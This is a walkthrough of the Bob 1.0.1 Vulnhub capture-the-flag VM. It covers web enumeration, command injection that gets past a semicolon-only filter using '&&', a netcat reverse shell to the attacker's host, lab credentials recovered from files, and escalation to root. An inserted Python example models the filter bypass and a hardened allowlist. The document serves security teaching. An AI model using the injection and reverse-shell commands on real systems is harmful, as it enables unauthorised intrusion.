Bob 1.0.1 Vulnhub Walkthrough

The Bob 1.0.1 VM download from Vulnhub can be found here: https://www.vulnhub.com/entry/bob-101,226/

The creator of this VM is c0rruptedb1t.

Here’s the basic description:

Difficulty: Beginner/Intermediate

Bob is my first CTF VM that I have ever made so be easy on me if it’s not perfect.

The Milburg Highschool Server has just been attacked, the IT staff have taken down their Windows server and are now setting up a Linux server running Debian. Could there be a few weak points in the new unfinished server?

Your Goal is to get the flag in /

Hints: Remember to look for hidden info/files

1. Service Enumeration

I started this off with the following nmap command:

The interesting results of the scan, in text format, are as follows:

This system is running two services: an Apache web service and an OpenSSH service.

2. Web Enumeration

I ran both nikto and dirbuster to see if one tool might find anything the other missed. They both had basically the same results, so, that being said, here are the results of the nikto scan:

The dirbuster settings / screenshots were also captured, in case you would prefer to use dirbuster instead of nikto, or run both together, for future VMs:

Reviewing the robots.txt file:

Screenshot of the dev_shell.php page (which is our attack vector):

Text output of lat_memo.html:

Text output of the passwords.html file:

The passwords file is going to be useful down the road for our privilege escalation.

3. Establish a foothold

So our attack vector is dev_shell.php. That being said, the developer / owner of the site added a security check to the PHP code that looks to see if someone injects a semi-colon (;) into the command field. If the semi-colon is found, we get a fun response that basically says “Nice try skid, but you will never get through this bulletproof php code.”

There are a number of different ways to execute other commands that do not use the semi-colon. I ended up using the double ampersand (&&), but one can use a pipe ( | ) or double pipe ( || ) to execute their commands as well:
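As an added example (not code from the walkthrough or from the VM), the following Python models the semicolon-only denylist described above, shows that it accepts the `echo && id` chaining trick, and contrasts it with an allowlist that passes argv as a list and never invokes a shell. The exact shape of the PHP check and the allowed command set are assumptions.

```python
import shlex
import subprocess
from typing import List, Optional

# Shell control operators that chain or substitute commands. The page's check
# only looks for the first of these, so the rest slip straight through.
CHAINING_OPERATORS = (";", "&&", "||", "|", "&", "`", "$(", "\n")


def semicolon_only_check(user_input: str) -> bool:
    """Model of the dev_shell.php check described on the page (assumed shape):
    the input is accepted, and would reach the shell, unless it contains ';'."""
    return ";" not in user_input


def operator_aware_check(user_input: str) -> bool:
    """Denylist extended to every chaining operator. Better, but still only as
    good as the list; shown for contrast with the allowlist below."""
    return not any(op in user_input for op in CHAINING_OPERATORS)


# Assumed allowlist for the demonstration; a real tool would keep this tiny.
ALLOWED_COMMANDS = frozenset({"echo", "id", "uptime"})


def plan_allowlisted(user_input: str) -> Optional[List[str]]:
    """Hardened form: tokenize without invoking a shell and require the first
    word to be an allowlisted program. Returns the argv list that would run,
    or None when the request is rejected. Because argv is passed as a list,
    '&&' or '|' become literal arguments to 'echo' rather than operators."""
    try:
        argv = shlex.split(user_input)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return None
    return argv


def run_allowlisted(user_input: str) -> Optional[str]:
    """Execute the planned argv with shell=False and return its stdout."""
    argv = plan_allowlisted(user_input)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    payload = "echo && id"  # the chaining trick used on the page
    print("semicolon-only check accepts:", semicolon_only_check(payload))  # True
    print("operator-aware check accepts:", operator_aware_check(payload))  # False
    print("hardened output:", repr(run_allowlisted(payload)))  # '&& id\n'
```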

Using echo && id I was able to get a response about what account the web server is running as:

On my Kali box, I launched the metasploit framework / console and set up my exploit / payloads:

After setting everything up, I typed run, which, to put it simply, acts like a netcat listener on our machine.

On the victim’s PHP shell, we used echo && nc 192.168.1.29 4444 -e /bin/bash and hit the submit button:

We have a basic reverse shell now:

In order to get an interactive shell, we use the following command:

4. Privilege Escalation

Based on our web enumeration, it looks like Bob is our system administrator. So I browsed to /home to see Bob’s directory and if there were any other users:

Bob’s Home Directory

Taking a look at Bob’s directory we see a “hidden” html file called old_passwordfile.html

Performing a head command on the file:

So now we have a pair of credentials for two of the four users on this system:

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Further searching into Bob’s home folder, we find something in his Documents:

The login.txt.gpg is an encrypted file which has Bob’s password. We will come back to this later.

The staff.txt file contains some information about how our system users interact with one another:

Further exploration into the Secrets folder under Bob, we come across a shell script file that was nested in a bunch of folders:

This shell script might not look like much, but it will come in handy later and will be discussed further on in the walkthrough.

Elliot’s Home Directory

The only thing of interest is the file seen above called theadminisdumb.txt — there wasn’t anything else of value in his home directory. That being said, here are the contents of the file:

So now we have verification that james (jc)’s password is indeed Qwerty and that Elliot’s password is theadminisdumb.

So to reiterate we have the following sets of credentials:

  • elliot:theadminisdumb
  • jc:Qwerty
  • seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Seb’s Home Directory

There wasn’t anything in here of significance.

At this point we need Bob’s credentials, since he is the admin of the box. Earlier in this walkthrough we found the login.txt.gpg file and a notes.sh shell script file containing some strings.

Here’s the notes.sh file again:

The first letter of each line actually spells out the word HARPOCRATES. Harpocrates was the Greek god of silence, secrets, and confidentiality.

Using the following command on the system itself:

We are using the built-in gpg encrypting / decrypting tool. We provide it the passphrase we found and specify that we want to decrypt the file.

The result shows us Bob’s password of b0bcat_

Signing in as bob:

So just to make sure, we perform a sudo -l to see if bob has root access or commands he can use:

Using sudo bash we obtain a root shell and then navigate to the / directory where the flag.txt file is per the VM description above.
